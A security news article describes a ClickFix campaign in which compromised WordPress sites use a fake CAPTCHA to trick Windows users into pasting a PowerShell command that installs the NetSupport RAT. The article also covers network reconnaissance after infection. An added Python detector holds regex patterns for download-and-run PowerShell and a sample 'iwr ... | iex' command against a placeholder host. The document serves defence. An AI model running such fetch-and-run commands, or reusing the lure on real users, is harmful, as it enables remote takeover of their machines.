Hackers Use ClickFix Technique to Deploy NetSupport RAT via Compromised WordPress Sites

Security researchers have uncovered a sophisticated cyberattack campaign leveraging compromised WordPress websites to distribute the NetSupport Remote Access Trojan through an innovative social engineering method dubbed “ClickFix.”

The Cybereason Global Security Operations Center (GSOC) discovered the campaign in May 2025, revealing how threat actors are weaponizing legitimate remote access tools to gain unauthorized control over victim computers.

The attack represents a significant evolution in cybercriminal tactics, combining website compromise with psychological manipulation to bypass modern security defenses.

Multi-Stage Attack Chain

The campaign begins with phishing emails, PDF attachments, or malicious links posted on gaming websites that redirect users to compromised WordPress sites.

Once visitors land on these infected pages, malicious JavaScript code hidden in the website’s meta description automatically loads and executes a remote script called “j.js” from the domain islonline.org.

“The attackers are specifically targeting Windows users and have built in mechanisms to avoid detection,” said cybersecurity analysts familiar with the investigation.

The malicious script first fingerprints the visitor’s operating system and browser, then uses a marker in the browser’s local storage to check whether the site has already been visited, so that the lure is not shown repeatedly and the attackers’ exposure is kept to a minimum.

[Figure: Attack Chain]

The most innovative aspect of the attack involves what researchers call the “ClickFix” technique.

After the initial infection, victims are presented with a fake CAPTCHA verification page that appears legitimate, complete with modern styling using React frameworks and TailwindCSS.

However, instead of verifying human interaction, the page secretly copies a malicious PowerShell command to the user’s clipboard.

Clipboard Hijacking Deception

The fake CAPTCHA then instructs users to press Windows + R and paste the “verification code” into the Run dialog box.

Believing they’re completing a standard security check, victims unknowingly execute a command that downloads and installs the NetSupport Client software.

“This technique is particularly insidious because it exploits user familiarity with CAPTCHA challenges while bypassing browser security controls,” explained security researchers.

[Figure: ClickFix attack chain]

“The user themselves perform the final execution step, evading automated detection systems.”

Once installed, the NetSupport Client establishes a persistent connection to command-and-control servers located in Moldova.

The malware creates registry entries for persistence and can survive system reboots, allowing attackers to maintain long-term access to compromised systems.

Post-Infection Activities

Within hours of a successful compromise, threat actors have been observed conducting reconnaissance activities, including querying Active Directory for domain computers and transferring files to public directories.

The attackers use NetSupport’s legitimate remote command prompt feature to execute commands such as “net group /domain ‘Domain Computers’” to map the network infrastructure.

According to threat intelligence data, NetSupport Manager ranked as the seventh most prevalent threat in 2024, with cybercriminals increasingly favoring legitimate tools to blend malicious activities with normal IT operations.

Security experts recommend immediate isolation of affected systems, password resets for compromised accounts, and blocking of identified malicious domains and IP addresses.

Organizations should also implement monitoring for unusual PowerShell activity and clipboard manipulation in browser contexts.
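As an added, defender-side illustration of that monitoring advice (example code written here, not from the article, Cybereason or the researchers it quotes): a small Python detector for the Run-dialog execution pattern over constructed process-creation events. It assumes Sysmon-style field names (ParentImage, Image, CommandLine) exported as one JSON object per line; the URL in the sample is a placeholder, not an indicator from the campaign.

```python
# Added example, not code from the article or Cybereason: flag the ClickFix
# execution pattern in constructed process-creation events. Pasting into Win+R
# runs the command as a child of explorer.exe; field names assume Sysmon Event ID 1.
import json
import re
from typing import Dict, List

RUN_DIALOG_PARENT = "explorer.exe"  # parent of anything launched via the Run dialog
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Fragments that fetch-and-run remote content, hide the window, or obscure the script.
INDICATORS = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|\biex\b|invoke-expression|"
    r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\bmshta\s+https?://)",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Return the lowercase file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_like(event: Dict[str, str]) -> bool:
    """True when explorer.exe spawns a scripting host with a download-and-run command line."""
    if basename(event.get("ParentImage", "")) != RUN_DIALOG_PARENT:
        return False
    if basename(event.get("Image", "")) not in SUSPICIOUS_CHILDREN:
        return False
    return INDICATORS.search(event.get("CommandLine", "")) is not None

def scan_events(lines: List[str]) -> List[Dict[str, str]]:
    """Parse one JSON event per line and return those matching the pattern."""
    hits = []
    for line in lines:
        if line.strip():
            event = json.loads(line)
            if is_clickfix_like(event):
                hits.append(event)
    return hits

# Constructed sample events; the URL is a placeholder, not an indicator from the article.
SAMPLE_EVENTS = [
    '{"ParentImage": "C:\\\\Windows\\\\explorer.exe", "Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "powershell -w hidden -c \\"iwr http://example.invalid/x.ps1 | iex\\""}',
    '{"ParentImage": "C:\\\\Windows\\\\explorer.exe", "Image": "C:\\\\Windows\\\\System32\\\\notepad.exe", "CommandLine": "notepad.exe"}',
    '{"ParentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe", "Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "powershell Get-Date"}',
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("ClickFix-like execution:", hit["CommandLine"])
```

explorer.exe also parents programs started from the desktop or Start menu, so the command-line check is what keeps the false-positive rate down; tune the indicator list to the environment.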

“The key is recognizing that any instruction requiring users to paste commands into Windows Run dialogs should be treated as highly suspicious,” security researchers emphasized.

Website administrators are advised to regularly audit WordPress themes and plugins for unauthorized script injections.

The campaign highlights the evolving threat landscape where attackers increasingly rely on social engineering rather than technical exploits to achieve their objectives.
